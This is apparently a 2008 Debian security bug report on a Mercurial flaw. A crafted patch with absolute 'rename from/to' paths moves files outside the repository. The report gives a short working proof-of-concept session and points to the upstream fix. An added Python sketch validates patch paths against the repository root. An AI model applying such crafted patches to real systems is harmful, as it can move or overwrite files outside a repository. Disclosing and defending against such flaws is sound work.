[Secure-testing-team] Bug#488628: mercurial: Insufficient input validation

Steffen Joeris steffen.joeris at skolelinux.de
Mon Jun 30 07:42:05 UTC 2008


Package: mercurial
Severity: grave
Tags: security, patch
Justification: user security hole

Hi

It is possible to rename arbitrary files, even outside
the repository, by using a maliciously crafted patch.

Proof of concept:

echo quux > /tmp/foo
cat /tmp/foo /tmp/bar
quux
cat: /tmp/bar: No such file or directory

hg init hg-sandbox; cd hg-sandbox
hg import - <<EOF
> diff --git a/a b/b
> rename from /tmp/foo
> rename to /tmp/bar
> EOF
applying patch from stdin
/tmp/foo not tracked!
abort: /tmp/bar not under root

cat /tmp/foo /tmp/bar
cat: /tmp/foo: No such file or directory
quux


The issue has been fixed upstream[0].
Please upload with high urgency to make sure the fix reaches testing
soon.

Cheers
Steffen

[0]: http://www.selenic.com/hg/rev/87c704ac92d4
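
In the session above the abort message is printed, yet /tmp/foo has already been moved to /tmp/bar. The following is an added example, not part of the original report and not the upstream Mercurial fix: a sketch of checking every "rename"/"copy" path in a git-style patch against the repository root before any file is touched. The names check_under_root, validate_patch_paths and UnsafePatchPath are hypothetical.

```python
import os
import re

# Git-style extended header lines that name a path to be moved or copied.
_PATH_HEADER = re.compile(r"^(rename|copy) (from|to) (.+)$")


class UnsafePatchPath(Exception):
    """Raised when a patch names a path outside the repository root."""


def check_under_root(root, path):
    """Return the repo-relative form of path, or raise UnsafePatchPath."""
    if os.path.isabs(path):
        raise UnsafePatchPath("absolute path in patch: %s" % path)
    root = os.path.realpath(root)
    # realpath resolves ".." components and symlinks before the comparison
    target = os.path.realpath(os.path.join(root, path))
    if os.path.commonpath([root, target]) != root:
        raise UnsafePatchPath("path escapes repository root: %s" % path)
    return os.path.relpath(target, root)


def validate_patch_paths(root, patch_text):
    """Check every rename/copy header before any file is touched.

    Returns a list of (operation, direction, relative_path) tuples.
    """
    checked = []
    for line in patch_text.splitlines():
        m = _PATH_HEADER.match(line)
        if m:
            op, direction, path = m.groups()
            checked.append((op, direction, check_under_root(root, path)))
    return checked


# Constructed sample input: the patch from the report above.
SAMPLE_PATCH = """diff --git a/a b/b
rename from /tmp/foo
rename to /tmp/bar
"""
```

Calling validate_patch_paths(repo_root, SAMPLE_PATCH) raises UnsafePatchPath on the first header, so no rename is attempted.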




